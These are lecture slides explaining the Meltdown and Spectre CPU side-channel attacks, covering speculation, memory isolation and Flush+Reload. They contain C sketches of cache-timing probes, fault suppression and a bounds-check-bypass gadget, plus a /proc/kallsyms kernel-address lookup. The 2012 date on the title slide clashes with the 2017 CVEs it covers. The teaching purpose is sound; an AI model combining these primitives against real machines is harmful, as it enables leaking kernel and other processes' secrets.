## Meltdown & Spectre

MonKey Lee

Ruilin Wen

2012-04

## Skylake Microarchitecture (from mdsattacks.com)






## Out-of-order Processor & Speculations (1)

- Out-of-order Execution
  - Tomasulo (CPU) & Scoreboarding (GPU)
  - Goal: keep all execution units of a CPU core as busy as possible
- Tomasulo



Figure 1.14: Pipeline of an out-of-order superscalar processor

## Out-of-order Processor & Speculations (2)

#### Instructions are

- fetched and decoded in the front-end
- dispatched to the backend
- processed by individual execution units

#### Instructions

- are executed out-of-order
- wait until their dependencies are ready
  - Later instructions might execute before earlier instructions
- retire in-order
  - State becomes architecturally visible
- Exceptions are checked during retirement
  - Flush pipeline and recover state
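
The interplay of out-of-order execution and in-order retirement can be sketched with a toy reorder buffer. This is a minimal model for illustration only: `rob_entry` and `retire_in_order` are hypothetical names, and a real core tracks far more state per instruction.

```c
#include <stdbool.h>
#include <stddef.h>

/* One in-flight instruction in a toy reorder buffer (hypothetical model). */
struct rob_entry {
    bool executed;  /* result already computed, possibly out of order */
    bool faulted;   /* execution detected an exception */
};

/*
 * Retire entries in program order, starting at index 0 (the oldest).
 * Stops at the first entry that has not executed yet, or at the first
 * faulting entry, in which case that entry and all younger ones are squashed.
 * Returns how many instructions became architecturally visible.
 */
size_t retire_in_order(struct rob_entry *rob, size_t n, bool *exception_raised) {
    size_t retired = 0;
    *exception_raised = false;
    for (size_t i = 0; i < n; i++) {
        if (!rob[i].executed)
            break;                        /* oldest instruction not done: wait */
        if (rob[i].faulted) {
            *exception_raised = true;     /* exception is checked at retirement */
            for (size_t j = i; j < n; j++)
                rob[j].executed = false;  /* flush the pipeline */
            break;
        }
        retired++;
    }
    return retired;
}
```

Note that a younger entry may already be marked `executed` when an older one faults. Its architectural result is discarded, but in real hardware it may still have touched the cache.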



## Out-of-order Processor & Speculations (3)

- To keep the execution part busy, we need:
- Speculations
  - Control-flow speculation
    - Branch Taken/Not-taken
    - Branch Target
    - Delayed Exception Handling
  - Data-flow speculation
    - Predict a value for the program to carry on
    - (AMD Predictive Store Forwarding)



- Ideally, the results of mispredicted work are discarded later
  - But this has FLAWS.
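
As a rough illustration of taken/not-taken prediction, the following sketches a textbook 2-bit saturating counter. This is an assumption chosen for simplicity: real predictors are far more elaborate and largely undocumented, and `predictor_t`, `predict_taken`, and `train` are hypothetical names.

```c
#include <stdbool.h>

/* Textbook 2-bit saturating counter: states 0,1 predict not-taken; 2,3 predict taken. */
typedef struct {
    unsigned state;  /* always in the range 0..3 */
} predictor_t;

/* Prediction used to fetch speculatively before the branch resolves. */
bool predict_taken(const predictor_t *p) {
    return p->state >= 2;
}

/* Update the counter once the real branch outcome is known. */
void train(predictor_t *p, bool taken) {
    if (taken) {
        if (p->state < 3)
            p->state++;
    } else {
        if (p->state > 0)
            p->state--;
    }
}
```

Because the counter only reflects recent history, a few repeated outcomes are enough to bias the next prediction, which is the property that speculation attacks rely on.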

## Spectre and Meltdown Variants



## Flush + Reload Attack



### Side-channel Attack

- Safe software infrastructure does not mean safe execution
- Information leaks because of the underlying hardware
- Exploit unintentional information leakage by side-effects















- It's possible to explicitly flush a cache line
  - CLFLUSH
- The same holds for measuring access latency
  - RDTSC / RDTSCP
- Both are non-privileged operations
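
The two primitives above can be wrapped in small C helpers using compiler intrinsics. This is a sketch assuming GCC or Clang on x86; `flush_line` and `timed_load` are hypothetical helper names, and the fence placement is one common choice rather than the only valid one.

```c
#include <stdint.h>
#include <x86intrin.h>  /* GCC/Clang on x86: _mm_clflush, _mm_mfence, _mm_lfence, __rdtscp */

/* Evict the cache line containing p from all cache levels (CLFLUSH). */
void flush_line(const void *p) {
    _mm_clflush(p);
    _mm_mfence();  /* wait until the flush has completed */
}

/* Return the number of timestamp-counter ticks one load from p takes (RDTSCP). */
uint64_t timed_load(const volatile char *p) {
    unsigned aux;  /* receives IA32_TSC_AUX; not used here */
    _mm_mfence();
    uint64_t start = __rdtscp(&aux);
    (void)*p;      /* the volatile read is the access being timed */
    uint64_t end = __rdtscp(&aux);
    _mm_lfence();
    return end - start;
}
```

A load that follows `flush_line` is expected to take noticeably longer than a repeated load of the same line. The exact cycle counts depend on the machine, so any threshold has to be calibrated per system.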

## Code Example

```
void victim(char *buf) {
    int secret = 84;  // assumed secret value
    // The load brings the cache line at page `secret` into the cache.
    *(volatile char *)&buf[secret * 4096];
}
```

#### Flush+Reload over all pages of the array



#### Why 4096 here?

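```
int attack() {
    char *buf = malloc(1024 * 4096);
    // Flush: evict every cache line of the probe array.
    for (int i = 0; i < 1024 * 4096; i += 64)
        clflush(buf + i);
    victim(buf);
    // Reload: time one access per page.
    for (int i = 0; i < 1024 * 4096; i += 4096) {
        int64_t start = rdtsc();
        *(volatile char *)&buf[i];
        int64_t end = rdtsc();
        if (end - start < THRESHOLD)
            return i / 4096; // the index of the cached page is the secret
    }
    return -1; // no cache hit observed
}
```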
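
The encode and decode logic of the attack can be checked without any timing by replacing the cache with a software model. The sketch below is purely illustrative: `page_cached` and the `sim_*` functions are hypothetical, and the probe array is shrunk to 256 pages (one per byte value). On the stride question, the reason commonly given is that a page-sized stride puts every candidate value on its own page, so a hardware prefetcher pulling in neighboring lines does not produce false cache hits.

```c
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

#define PAGE_SIZE  4096
#define NUM_VALUES 256  /* assumption: one probe page per possible byte value */

/* Software stand-in for "is the probed line of page k currently cached?". */
static bool page_cached[NUM_VALUES];

/* Flush step: no probe page is cached afterwards. */
void sim_flush_all(void) {
    memset(page_cached, 0, sizeof page_cached);
}

/* Models a load of buf[offset]: the page containing offset becomes cached. */
void sim_load(size_t offset) {
    page_cached[offset / PAGE_SIZE] = true;
}

/* Victim: the secret byte selects which page is touched. */
void sim_victim(unsigned char secret) {
    sim_load((size_t)secret * PAGE_SIZE);
}

/* Reload step: the index of the cached page is the secret, -1 if none is cached. */
int sim_recover(void) {
    for (size_t off = 0; off < (size_t)NUM_VALUES * PAGE_SIZE; off += PAGE_SIZE)
        if (page_cached[off / PAGE_SIZE])
            return (int)(off / PAGE_SIZE);
    return -1;
}
```

Calling `sim_flush_all()`, then `sim_victim(84)`, then `sim_recover()` walks through the same three phases as the real attack, with the timing measurement replaced by a lookup in `page_cached`.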

## Summary of Hardware Side-channel

- Stateful Attack (e.g. Cache)
  - (the Attacker) restores the shared resource to a known state
  - (the Victim) executes and changes the state
  - (the Attacker) checks the state of the shared resource again to learn secrets about the victim's execution
- Stateless Attack (not included in this talk, see LOTR paper)
  - (the Attacker) passively monitors the latency of accessing the shared resource and uses variations in this latency to infer secrets about the victim's execution
  - e.g. in LOTR:
  - Ring-bus contention encodes a "1", no contention a "0"
  - The authors claim a leak rate of 4 Mbps and that leaking a private key from a crypto routine is possible
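
The contention encoding in the stateless case can be sketched as a simple threshold decoder. This is a minimal illustration, not the LOTR authors' code: `decode_bits` is a hypothetical helper, and both the latency samples and the threshold would come from measurement and calibration on the target machine.

```c
#include <stddef.h>
#include <stdint.h>

/*
 * Turn one latency sample per bit interval into a bit:
 * latency above the threshold means contention ("1"), otherwise "0".
 * Returns the number of 1-bits decoded.
 */
size_t decode_bits(const uint64_t *latency, size_t n, uint64_t threshold,
                   unsigned char *bits) {
    size_t ones = 0;
    for (size_t i = 0; i < n; i++) {
        bits[i] = latency[i] > threshold ? 1 : 0;
        ones += bits[i];
    }
    return ones;
}
```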

# Meltdown

CVE-2017-5754



## Overview

#### the authors claim...

- Meltdown exploits <u>side effects of out-of-order execution</u> on modern processors.
- Meltdown breaks all security guarantees provided by <u>address</u> space isolation.
- Meltdown can …
  - read arbitrary kernel-memory locations including personal data and passwords.
  - read memory of other processes or virtual machines in the cloud without any permissions or privileges.

### Outline

- Memory Layout & Isolation of an OS
- Side-channel of Cache
  - Flush + Reload Attack
- Out-of-order Processor & Speculations
- Building the Attack

## Memory Isolation of an OS (1)

[Figure: virtual address space layout showing user addresses, non-canonical addresses, and kernel addresses]



Applications

- Find something human readable, e.g., the Linux version

`# sudo grep linux_banner /proc/kallsyms`

`ffffffff81a000e0 R linux_banner`

- Kernel is isolated from user space
- This isolation is a combination of hardware and software
- User applications cannot access anything from the kernel

## Memory Isolation of an OS (2)

Page Table



## Memory Isolation of an OS (3)

- CPUs support virtual address spaces to isolate processes
- Physical memory is organized in page frames
- Virtual memory pages are mapped to page frames using page tables
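
To make the mapping concrete, the sketch below splits a virtual address into the table indices used by a page-table walk. It assumes x86-64 with 4-level paging and 4 KiB pages. `va_parts` and `split_va` are hypothetical names.

```c
#include <stdint.h>

/* Indices used by a 4-level x86-64 page-table walk (4 KiB pages assumed). */
struct va_parts {
    unsigned pml4;    /* bits 47..39: index into the top-level table */
    unsigned pdpt;    /* bits 38..30 */
    unsigned pd;      /* bits 29..21 */
    unsigned pt;      /* bits 20..12: index into the last-level page table */
    unsigned offset;  /* bits 11..0: byte offset within the page frame */
};

struct va_parts split_va(uint64_t va) {
    struct va_parts p;
    p.pml4   = (unsigned)((va >> 39) & 0x1ff);
    p.pdpt   = (unsigned)((va >> 30) & 0x1ff);
    p.pd     = (unsigned)((va >> 21) & 0x1ff);
    p.pt     = (unsigned)((va >> 12) & 0x1ff);
    p.offset = (unsigned)(va & 0xfff);
    return p;
}
```

For a kernel address such as `0xffffffff81a000e0`, the top-level index is 511, the last entry of the top-level table, which is where the kernel's mappings live.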



User/Supervisor bit defines in which privilege level the page can be accessed
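
The effect of that bit can be sketched as a check on a single page-table entry. The bit positions follow the x86 entry layout (bit 0 Present, bit 2 User/Supervisor). `access_allowed` is a hypothetical helper, and a real walk applies the check at every table level, not only the last one.

```c
#include <stdbool.h>
#include <stdint.h>

#define PTE_PRESENT (1ULL << 0)  /* page is mapped */
#define PTE_USER    (1ULL << 2)  /* User/Supervisor: set means user mode may access */

/* Simplified permission check for one page-table entry. */
bool access_allowed(uint64_t pte, bool user_mode) {
    if (!(pte & PTE_PRESENT))
        return false;  /* unmapped page: page fault */
    if (user_mode && !(pte & PTE_USER))
        return false;  /* supervisor-only page touched from user mode */
    return true;
}
```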

## Memory Layout of an OS



- In the past...
- For performance reasons, the memory reserved for the kernel is mapped into every process's virtual address space.

## Answer: Why won't this work? (ideally)

```
char data = *(char*) 0xffffffff81a000e0;
printf("%c\n", data);
```

- We try to load an inaccessible address
- Permission is checked

## Building the Attack: Toy Example

```
*(volatile char*) 0; // raise_exception();
array[84 * 4096] = 0;
```

Flush+Reload over all pages of the array



- "Unreachable" code line was actually executed
- Exception was only thrown afterwards

## Building the Attack: The Blueprint

- Out-of-order instructions leave microarchitectural traces
  - We can see them for example in the cache
- Give such instructions a name: transient instructions
- We can indirectly observe the execution of transient instructions



## Building the Attack: Crash Handling

- Transient instructions are executed all the time
- Loading inaccessible addresses leads to a crash (segfault)
- How to prevent the crash?
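
One way to survive the fault, which the summary lists as the POSIX signal handler option, is to install a SIGSEGV handler and jump back to a recovery point. The sketch below assumes a POSIX system. `try_read_byte` and `on_segv` are hypothetical names, and the code only demonstrates surviving the fault, not the leak itself.

```c
#define _POSIX_C_SOURCE 200809L
#include <setjmp.h>
#include <signal.h>
#include <stddef.h>

static sigjmp_buf recover_point;

/* SIGSEGV handler: abandon the faulting access and resume at the recovery point. */
static void on_segv(int sig) {
    (void)sig;
    siglongjmp(recover_point, 1);
}

/* Returns the byte at addr, or -1 if the access raised SIGSEGV. */
int try_read_byte(const volatile unsigned char *addr) {
    struct sigaction sa, old;
    int result;

    sa.sa_handler = on_segv;
    sigemptyset(&sa.sa_mask);
    sa.sa_flags = 0;
    sigaction(SIGSEGV, &sa, &old);

    if (sigsetjmp(recover_point, 1) == 0)
        result = *addr;  /* may fault; the handler then jumps back */
    else
        result = -1;     /* reached via siglongjmp after the fault */

    sigaction(SIGSEGV, &old, NULL);  /* restore the previous handler */
    return result;
}
```

Architecturally, an inaccessible address always yields -1 here. The attack relies on what happens transiently before the fault is delivered, which this helper does not observe.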







## To sum up, the Meltdown attack is ...

- 1. Flush the array
- 2. The user program reads a kernel-side virtual address into a register, **secret\_to\_be\_leaked**
- 3. Before the exception is actually handled by the hardware, a follow-up memory access to **array** encodes **secret\_to\_be\_leaked** in the cache state
- 4. The exception is handled by the hardware
  - Prevent the crash with:
  - a POSIX signal handler (SIGSEGV)
  - or Intel TSX (another advanced hardware feature)
- 5. Use Flush + Reload to recover **secret\_to\_be\_leaked**



- Index of cache hit reveals data
- Permission check is in some cases not fast enough



# Spectre

CVE-2017-5753, CVE-2017-5715



## To Recap: Skylake Microarchitecture (from mdsattacks.com)



## Variants

- Variant 1: Bounds Check Bypass
- Variant 2: Branch Target Injection
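
For Variant 1, the vulnerable code pattern is usually illustrated with a bounds-checked double array access. The sketch below is modeled on the widely cited example from the Spectre paper. The array sizes and contents are assumptions for illustration, and the function is architecturally correct C: the leak only arises if the processor speculates past the bounds check.

```c
#include <stddef.h>
#include <stdint.h>

#define PAGE_SIZE 4096

uint8_t array1[16] = {1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16};
size_t  array1_size = 16;
uint8_t array2[256 * PAGE_SIZE];  /* probe array: one page per byte value */

/*
 * Architecturally, an out-of-bounds x never reaches the array accesses.
 * If the branch is mispredicted as in-bounds, array1[x] may be read
 * transiently and leave a value-dependent line of array2 in the cache.
 */
uint8_t victim_function(size_t x) {
    if (x < array1_size)                       /* the bounds check */
        return array2[array1[x] * PAGE_SIZE];  /* may execute speculatively */
    return 0;
}
```

An attacker would first call `victim_function` with in-bounds values to train the branch predictor, then pass an out-of-bounds `x` and run Flush + Reload over `array2`.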




## Spectre Attacks: Exploiting Speculative Execution

IEEE Security & Privacy (May 20, 2019)

Paul Kocher<sup>1</sup>, Jann Horn<sup>2</sup>, Anders Fogh<sup>3</sup>, Daniel Genkin<sup>4</sup>, Daniel Gruss<sup>5</sup>, Werner Haas<sup>6</sup>, Mike Hamburg<sup>7</sup>, Moritz Lipp<sup>5</sup>, Stefan Mangard<sup>5</sup>, Thomas Prescher<sup>6</sup>, Michael Schwarz<sup>5</sup>, Yuval Yarom<sup>8</sup>

<sup>1</sup> Independent, <sup>2</sup> Google Project Zero, <sup>3</sup> G DATA Advanced Analytics, <sup>4</sup> University of Pennsylvania and University of Maryland,

<sup>5</sup> Graz University of Technology, <sup>6</sup> Cyberus Technology, <sup>7</sup> Rambus, Cryptography Research Division, <sup>8</sup> University of Adelaide & Data61

All trademarks are the property of their respective owners. This presentation is provided without any guarantee or warranty whatsoever.